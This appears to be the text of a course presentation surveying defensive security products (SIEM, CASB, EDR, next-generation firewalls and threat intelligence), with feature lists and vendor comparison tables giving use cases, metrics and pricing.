Ethical hacking class assignment
Overall Security Process Review CISC 662
1
Agenda
Review of the following technologies and current products:
SIEM
CASB
EDR (Enterprise Detection and Response)
NGFW (Next Generation Firewalls)
Threat Intelligence
Summary of Term
SANS Technology Institute - Candidate for Master of Science Degree
What is a SIEM?
SIEM - Security Information Event Management
Logging and Event Aggregation
Network (router,switch,firewall,etc)
System (Server,workstation,etc)
Application (Web, DB )
Correlation Engine
2+ related events = higher alarm (1+1=3)
3
At first glance SIEM's appliances and software look like an event aggregator. While a SIEM has the advantage of aggregating logs what puts them apart from the event aggregator market are the correlation engines.
The correlation engines allow the ability to uncover threats/attacks across multiple related events which by themselves would not be a cause for alarm.
SIEM
4
What is a SIEM?
5
Security information and event management (SIEM) is the technology that can tie all your systems together and give you a comprehensive view of IT security.
IT security is typically a patchwork of technologies – firewalls, intrusion prevention, endpoint protection, threat intelligence and the like – that work together to protect an organization’s network and data from hackers and other threats. Tying all those disparate systems together is another challenge, however, and that’s where SIEM can help.
SIEM systems manage and make sense of security logs from all kinds of devices and carry out a range of functions, including spotting threats, preventing breaches before they occur, detecting breaches, and providing forensic information to determine how a security incident occurred as well as its possible impact.
Using SIEM
How do SIEM Products help the following Security concerns?
Countermeasures to detect attempts to infect internal system
Identification of infected systems trying to exfiltrate information
Mitigation of the impact of infected systems
Detection of outbound sensitive information ( DLP)
6
These questions are a core part of a companies overall security architecture. If a SIEM isn't providing answers or solutions to these questions what is it doing?
If you aren't using your SIEM to solve issues like these it may just be an expensive log aggregator/collection system sitting in your network collecting dust.
SIEM Advantages
Correlation of data from multiple systems and from different events detecting security and operational conditions
Anomaly detection by using a baseline of events over time to find deviations from expected or normal behavior
Comprehensive view into an environment based on event types, protocols, log sources, etc
APT (advanced persistent threat) protection through detection of protocol and application anomalies
Prioritization based on risk of threat to assets, staff can triage the most vulnerable targets
Alerting and monitoring on events of interest to escalate priority
Ability to filter events and create custom views to meet business needs
Allows organizations to demonstrate adherence to polices and controls
Monitor and log the access and use of sensitive data
Limits exposure to breach disclosure costs by knowing the number or customer records affected
Helps reduce risk to business partners and customers by detecting data loss and fraud
Reduce costs by replacing redundant functions and technologies
7
Almost all SIEM Vendors try to satisfy these common advantages.
Vendor Approaches
Log Rhythm (http://logrhythm.com/)
Qradar (http://www.q1labs.com/)
Prismmicrosystems (http://www.prismmicrosys.com/)
Nitro Security (http://nitrosecurity.com/)
8
Log Rhythm
Audit privileged user activity such as new account creation for greater operational transparency
Correlate privileged user behavior with specific network activity
View real-time activity and drill down based on relevant criteria
Map global relationships to identify communication involving suspicious sources and/or destinations
Visualize network communication to identify anomalous patterns and data transfers
Deliver real-time alerts on unauthorized access of sensitive data and information transfers to unapproved recipients
Independently audit and log data transfer to removable media such as USB drives and memory cards
Correlate access of sensitive data with printer logs and user activity
Independently monitor processes for increased awareness of potential malware and spyware
9
QRadar
Hardened, Linux-based appliance solution
Integrated flow collection enables passive profiling of network asset applying context rules to discovered assets
Integration of external VA scanner results applies further context to rules, and weights to incidents.
Trend analysis and anomaly detection for detecting statistical anomalies and threshold violations
Ability to spot problems based on historical trends and current activity
Increased forensics by combining fully integrated network activity with log data
Agentless collection for most log sources, including Windows; Q1 Labs provided Windows agent option, ALE, reads event data and has plug-ins for sources such as IIS, SQL Server, etc
Geo-location ability, find traffic location based on IP address
Product ships with 120 standard correlation rules, 1600 out-of-the-box report templates. Adding site/industry-specific rules is easy
Company autoupdates rules with every major release of QRadar
Correlation rule editor is simple to use -- it resembles Microsoft Outlook's rules wizard
Appliance has a distributed database (ARIEL) that excels at write-once read many times and grow incrementally as you add QRadar appliances. Eliminates backend database, enables efficient High Availability
Segregation of duties based on job responsibility and business need
Reports are single-pane view containing all relevant information for reporting and investigation
10
Prism Microsystems
Software only solution running on Windows O/S
No database, log data stored in compressed CAB files, SHA-1 and 92% raw log compression
Integration into current Active Directory environment, monitors log from major vendors
Indexed search with custom keywords
Allows central management and deployment, monitors business critical components
Database Monitoring MS SQL, Oracle, and others via ODBC
Point and click design of reports
Provides high-level dashboards to low-level detail
Optional Agents for Windows, Solaris BSM, IBM iSeries and AS 400
Windows Agent features
central management / deployment capability
monitors USB drives, application logs, network connections, processes, change audits and config assessments
11
Nitro Security
Fast Database - High-level to packet level
No DBA management
"Single pane of glass" GUI
Regular expression rules engine
Multiple filtering options
Passive database monitoring
Auto discover feature to find "rogue" database instances
Resolves "pooled" connections for applications
Geo-location tracking
Linux-based appliance - FIPS 140-2/CC EAL Level 3 certified
12
Top SIEM Vendors
13
| VENDOR/PRODUCT | USE CASES | METRICS | INTELLIGENCE | DELIVERY | PRICING |
| Micro Focus (HP) ArcSight | Enterprises | 350+ data sources, 75,000 events per second (EPS) | Integrates with machine learning, intelligence platforms | Appliance, software or cloud | Based on data ingested and events per second (EPS) |
| Splunk Enterprise Security | Highly-regulated industries | Most users ingest several petabytes daily | Integrates with Splunk UBA & machine learning toolkit | Software or cloud | Based on max daily data volume; starts at $1,800/GB/day |
| IBM Security QRadar | Enterprises and regulated industries | 400+ sources, scales to millions of events per second | UBA, forensics, packet inspection, Watson integration | Cloud or hardware, software or virtual appliance | Cloud starts at $800/ month; on-premises at $10,400 |
| AlienVault Unified Security Management | Lower-cost option for on-premises or AWS | Up to 15,000 EPS | Global network sharing 1 million threats daily | Cloud or virtual or hardware appliance | Lower-cost open source-based product |
| LogRhythm | Scales from midrange to enterprise | Highly scalable decentralized architecture | Machine analytics for advanced threats | Appliance, software or virtual instance | Subscription pricing tied to volume consumption |
| McAfee Enterprise Security Manager | Support for public sector, education and healthcare | 50,000+events per second, billions of events stored | Automated task and policy changes | Physical or virtual appliance | Based on EPS capacity, starting at $39,995 |
| Micro Focus Sentinel Enterprise | MSSPs and distributed enterprises | Event taxonomy comprises more than 200 fields | Integrates with NetIQ technologies | Software or virtual appliance | Based on EPS and per device |
| Solar Winds Log & Event Manager | Security teams looking for easy, lower-cost solution | Up to 250 million events per day | Thresholds can be set for abnormal behavior | Virtual appliance | Starts at $4,495 for 30 nodes |
| Trustwave SIEM Enterprise | Mid-market and enterprise | Millions of daily events | Analytics and threat intelligence from SpiderLabs | Appliance, software or managed service | Subscription or fee- based consulting |
| RSA NetWitness | Financial, government, energy, telecoms | 30,000 EPS, 10Gbps & 100,000 endpoints per scalable system | Streaming analytics, machine learning , automation | On-premises, virtual, cloud and hybrid options | Based on throughput per 50 GB of logs and 1TB of packets |
CASB
14
Cloud Access Security Broker (CASB)
Intent
CASBs are security enforcement points between consumers and service providers that apply security controls to access cloud services, usually SaaS services. They may also control access to internal company resources. Security controls may include authentication (credentials and passwords), authorization policy enforcement, intrusion prevention, antimalware filters, security logging/auditing, and encryption.
Solution idea
Cloud Space
Class diagram of CASB
Solution
Consumers (users) request services through the Broker, which in turn gets them from one of the Service Providers
The Broker includes a set of security mechanisms such as a SecurityLogger/Auditor, an Authorizer, an Authenticator, an Encryptor, and maybe others
Consumers and CASBs can be mutually authenticated. The CASB enforces rights for the consumers when they try to access an application. InternalResources (applications) can also be controlled by the CASB. An Identity Federation provides identifiers across consumers and SPs.
CASB and deployment modes
| Log collection | Forward Proxy | Reverse Proxy | API | |
| Employee monitoring | x | |||
| Risk profiling | x | |||
| Security Gap detection | x | |||
| Group activity analytics | x | |||
| Activity monitoring | x | x | x | x |
| Detect insider threats | x | x | x | x |
| Detect compromised accounts | x | x | ||
| DLP | X (transit) | X (transit) | X (inspection) | |
| Malware | X (exfil) | X (stored in system) | ||
| Encryption | x | x | x | |
| Configuration management | x | x | ||
| Access management | x | x | x | |
| DRM | x | x | ||
| Decryption | x | x |
Sanctioned or unsanctioned apps
Users – on-network or off-network
Devices – managed or unmanaged
Data – at rest or in motion
Use case “Access an application service”
RP
FP
API
RP
FP
log
FP
RP
FP
Known uses
Adallom [Ada15]—integrates with the authentication services in SaaS to let institutions monitor the activities of users in any location and any device. This product includes a behavior analysis component to assess the possible risk of specific transactions.
Bitglass [Bit]—provides RBAC, encryption, session control, identity, and DRM.
Cipher Cloud [Cip]-- protection controls include encryption, tokenization, monitoring, data loss prevention, and malware detection.
Elastica Cloudsoc [Ela15]—Provides authentication, authorization, monitoring, and other services. It can interact with third-party APIs.
Skyhigh Networks [Sky]—includes encryption, logging/auditing, access control, and anomaly detection (IDS). It also provides risk ratings of cloud services. Integrates authentication with standards such as SAML.
IBM (http://www-03.ibm.com/security/cloud/cloud-security-enforcer.html)
| Top CASB vendors | |||||
| VENDOR | USE CASES | FEATURES | TECHNOLOGY | DELIVERY | PRICING |
| Forcepoint | Large to very large enterprises | Deep support for top cloud applications, with ability to support many more | API, proxy and hybrid | Cloud | Subscription based on number of users, plus options like governance and audit |
| Skyhigh Networks | Mid to large enterprises | Threat protection and DLP; dedicated GDPR offering | Combination of API and proxy depending on use case | Cloud, software or appliance | Priced on per-user, per- year basis |
| Cisco Systems | Organizations with 1,000+ employees | Micro services exposed via APIs can support home- grown apps | API | Cloud | Priced on number of apps and users |
| Microsoft | Small and mid-sized companies | Deep integration with Microsoft security and Office 365 | API, with in- session proxy control | Cloud | $5 a month per user; also part of Microsoft Mobility + Security |
| Bitglass | Small through large enterprises | Integrated IAM; agentless support for any app or device | Hybrid | Cloud | Priced per user per month |
| Netskope | Enterprises | Covers thousands of cloud services; DLP and threat analytics | API, proxy and hybrid | Cloud, appliance or both | Priced per user per year |
EDR
EDR Explained
Endpoint detection and response (EDR) platforms are a category of endpoint security tools, built to provide endpoint visibility, and are used to detect and respond to cyber threats and exploits.
Gartner’s Senior analyst Anton Chuvakin defined the term in 2013 as tools that are primarily focused on detecting and investigating suspicious activities (and traces of such) on hosts/endpoints.
Endpoint data has a clear advantage when it comes to protecting against advanced threats. Endpoints are where hacker activity takes place. They provide an accurate, first hand view of a hacking operation as it unfolds.
Endpoints provide critical forensics information including process actions, file access information, network events and endpoint configuration changes.
Endpoint detection and response platforms were built to provide comprehensive visibility to endpoints and servers, monitor behaviors and spot abnormal behaviors that are indicative of malicious activity. By continuously monitoring and analyzing activities on the endpoint EDR tools enable detection and response to cyber attacks that managed to pass other security protection tools.
EDR Functions
They enable detection
They cross-correlate data across the whole environment
They combine whitelisting and blacklisting with behavioral analysis
They are able to observe endpoint activity without interfering
They empower IR and forensics investigation
They enable effective cleanup and remediation
They work with your antivirus
Top EDR Solutions - 1
| VENDOR | USE CASES | METRICS | INTELLIGENCE | DELIVERY | PRICING |
| FireEye | From 250 to 300,000 endpoints; cloud for SMBs | 1,000+ researchers; 1,000 Mbps throughput | Automated threat detection and prevention for known and unknown threats | Cloud or appliance | Starts at $30 per endpoint, plus intelligence feeds and appliance costs |
| Carbon Black | All markets and sizes, but strongest in high-risk industries | Up to 150,000 endpoints per cluster, with unlimited clusters | Defense Cloud analytics engine identifies malicious activity | Software or cloud | Starts at $30 per endpoint per year |
| Guidance Software | Large organizations | Can scale to hundreds of thousands of nodes | Automated alert response, validation, triage and incident response | Software | Starts at $57,995 for up to 2,000 nodes on a perpetual license |
| Cybereason | Organizations of any size or vertical with little security talent | Can render 8 million questions per second with unlimited scalability | Machine learning and analytics | Cloud or on- premises | Starts at $50 per endpoint before volume discounting |
| Symantec Endpoint Protection with EDR | Boasts 25% of all deployments worldwide and 350,000 customers | Scales to hundreds of thousands of endpoints | AI and world’s largest threat intelligence network | Physical or virtual appliance | Starts at $40 per seat per year |
Top EDR Solutions - 2
| VENDOR | USE CASES | METRICS | INTELLIGENCE | DELIVERY | PRICING |
| RSA NetWitness Endpoint | Strongest in finance, healthcare, government, energy, telcos | More than 300 behavioral indicators can be customized | Behavioral-based analytics engine and machine learning | Agents deployed across multiple form factors; management console on-premises | Pricing on a per- endpoint basis |
| Cisco AMP for Endpoints | Strong in high-risk verticals | Top score from NSS Labs; 20 billion threats blocked per day | Adaptive intelligence, automated detection and response | Cloud, private cloud, or on-premises appliance | Pricing is based on length of subscription and number of endpoints |
| Tanium | Large organizations | Millions of endpoints and 15-second visibility across all endpoints | Automation workflows data collection and corrective actions | Appliance, virtual machine, or standalone server | Company doesn’t disclose pricing |
| CrowdStrike | Large organizations | More than 30 billion events per day from millions of sensors across 176 countries | APIs and feeds for integration with SIEM, IDS, and Threat Intelligence platforms | Cloud | Subscription-based pricing |
| CounterTack | From SMBs to enterprises | Can complete billions of scans per second | Via a strategic partnership with SAP | Platform or cloud | $14,000 per perpetual seat; $7,500 annual subscription seat |
Next Generation Firewalls (NGFWs)
Firewalls
Firewalls are a standard security tool for the majority of companies, but in today’s changing threat landscape, next generation firewalls are the only firewalls that can provide proper protection.
A DEFINITION OF NEXT GENERATION FIREWALL
A next generation firewall (NGFW) is, as Gartner defines it, a :
“deep-packet inspection firewall that moves beyond port/protocol inspection and blocking to add application-level inspection, intrusion prevention, and bringing intelligence from outside the firewall.”
TRADITIONAL FIREWALLS VS. NEXT GENERATION FIREWALLS
Next generation firewalls are a more advanced version of the traditional firewall, and they offer the same benefits. Like regular firewalls, NGFW use both static and dynamic packet filtering and VPN support to ensure that all connections between the network, internet, and firewall are valid and secure. Both firewall types should also be able to translate network and port addresses in order to map IPs.
There are also fundamental differences between the traditional firewall and next generation firewalls. The most obvious difference between the two is an NGFW’s ability to filter packets based on applications. These firewalls have extensive control and visibility of applications that it is able to identify using analysis and signature matching. They can use whitelists or a signature-based IPS to distinguish between safe applications and unwanted ones, which are then identified using SSL decryption. Unlike most traditional firewalls, NGFWs also include a path through which future updates will be received.
NGFW Benefits
NGFWs are able to block malware from entering a network
They are better equipped to address Advanced Persistent Threats (APTs).
NGFWs can be a low-cost option for companies looking to improve their basic security because they can incorporate the work of antiviruses, firewalls, and other security applications into one solution.
The provide application awareness, inspection services, as well as a protection system and awareness tools
Top NGFW Vendors - 1
| VENDOR | USE CASES | METRICS | INTELLIGENCE | DELIVERY | PRICING |
| Sophos | SMB and mid-market primarily, as well as IaaS on Azure | Throughput of 11,800 Mbps, 30 million concurrent connections and 300,000 new connections per second | Analytics into root cause of malware attacks, machine learning for better detection rates | Hardware, software and virtual appliance | Pricing starts at $249/year for entry- level appliance. Pricing depends on performance and features |
| Check Point | Strong in retail, financial services, government, healthcare, service providers, utilities, manufacturing | Firewall throughput from 90 Mbps in small office devices to 128 Gbps in high-end chassis- based systems | Inspects at the CPU-level to stop attacks, and OS-level threat emulation | On premises, virtually, in public clouds | Prices range from $499 up to a few hundred thousand dollars |
| Barracuda | Strong in central and southern EMEA and North America, especially inmid to large enterprises with globally dispersed WANs or needing secure cloud connectivity | 40 Gbps firewall throughput, 10 Gbps VPN throughput and up to 15,000 users | Machine leaning and intelligence features to identify potential malware | On-premse and virtual versions | From $699 plus support |
| Juniper Networks | Small- to mid-size enterprise markets as well as service providers, telecom, financial services and healthcare | 2 Tbps firewall, six nines of reliability, more than 100 Gbps IPS, and 100 million concurrent user sessions | Juniper Sky Advanced Threat Prevention cloud-based service, which leverages reporting and analytics tools, and machine learning algorithms | Appliances, software, private and public clouds | Low-end appliances start around $300 |
| Fortinet | Data centers, distributed mid-to-large enterprises, communications service providers, government, defense, finance, education and retail | Firewall throughput of up to 630 Gbps, IPS of up to 120 Gbps, NGFW throughput of up to 100 Gbps, and a threat intelligence network of 3.3 million sensors | Machine learning-based threat intelligence and deep analytics | Hardware appliance, virtual machine, cloud and SaaS | Entry-level hardware appliances start at around $500 |
Top NGFW Vendors - 2
| VENDOR | USE CASES | METRICS | INTELLIGENCE | DELIVERY | PRICING |
| Forcepoint | Distributed enterprises and government agencies | Can manage 2,000 firewalls and IPS devices with the ability to update hundreds in minutes | Analysis of the behavior of anomalous network connections | Physical appliance, virtual and cloud deployments | Starting at under $1,000 |
| SonicWall | SMBs, midmarket and large enterprise | Gateway throughput of up to 9 Gbps, TLS/SSL inspection throughput of up to 3 Gbps and up to 10 million connections | More than a million SonicWall sensors provide data that is analyzed via machine learning using deep learning algorithms | On premises appliances | From around $500 for a small business or branch office up to around $80,000 |
| Palo Alto Networks | All industries | 200 Gbps of firewall throughput, 100 Gbps of threat prevention throughput, 1.2 million connections per second and up to 80 million sessions | Automated event aggregation and filtering | Physical and virtual appliances | No pricing data avaialble |
| Cisco | SMBs to large enterprise | 1.2 Tbps clustered throughput, 57 million concurrent connections, 500,000 new connections per second | IP, URL, and DNS threat intelligence | Physical and virtual firewalls | Starting at under $1,000 |
| Huawei | Asia/Pacific region or EMEA, especially in enterprises | 10 Gbps attack and defense performance | Traffic analysis | Physical appliances, and avirtual firewall compatible with Microsoft Azure | Starting price less than $2,000 |
Threat Intelligence - 1
| VENDOR | USE CASES | METRICS | INTELLIGENCE | DELIVERY | PRICING |
| IBM | Retailers, financial services, enterprise | Unlimited queries per month, and up to 5,000 records per month | Machine learning and IBM Watson analytics | Via web browser or through an API interface to interface with existing security solutions | The API is free for 5,000 records/month; the commercial API starts at $2,000 per user/month |
| Anomali | Financial services, enterprise | Can process millions of Indicators of Compromise (IOCs) | Machine learning and integration with other security platforms | SaaS, on-premises, or hybrid | Pricing varies based on customer environment |
| Palo Alto Networks | Large enterprises | Receives hundreds of millions of samples per month, and over a trillion artifacts across petabytes of data | Statistical analytics, correlation and machine learning | SaaS-based security services | Licensed as a per-user annual subscription or enterprise-wide |
| RSA | financial institutions, governments and oil/ gas/energy/telcos | Can ingest 30,000 EPS per system and up to 100k endpoints per system | Automated segmentation and enforcement | On premises, in private clouds, on virtual machines, or public cloud | Tiered throughput or subscription licensing |
Threat Intelligence - 2
| VENDOR | USE CASES | METRICS | INTELLIGENCE | DELIVERY | PRICING |
| LogRhythm | Financial services, retail, manufacturing, and government | 26 billion messages per day and over 10K gigabytes per day | Pattern matching and advanced correlation to machine learning and statistical analysis | Software and hardware | Pricing begins at $27,000 |
| FireEye | Financial services, government and IT | More than 1,000 experts responding to incidents and researching attacks | Automation enables it to go from alert to fix in seconds | Via API integration, intelligence portal, and email delivery | Subscriptions range from $100,000 to $500,000 |
| LookingGlass Cyber Solutions | Enterprise and third party risk monitoring | Over 140 sources of threat data gathered | Machine-readable threat intelligence | Hosted or on- premise | Open-source business model |
| AlienVault | Companies with smaller IT security teams | Receives 10 million indicators of compromise every day | Automation and machine learning | Cloud, virtual or hardware appliance | Monthly subscription; Tiers start at $1,575/ month for a 250 GB data volume |
Thank You!
Questions?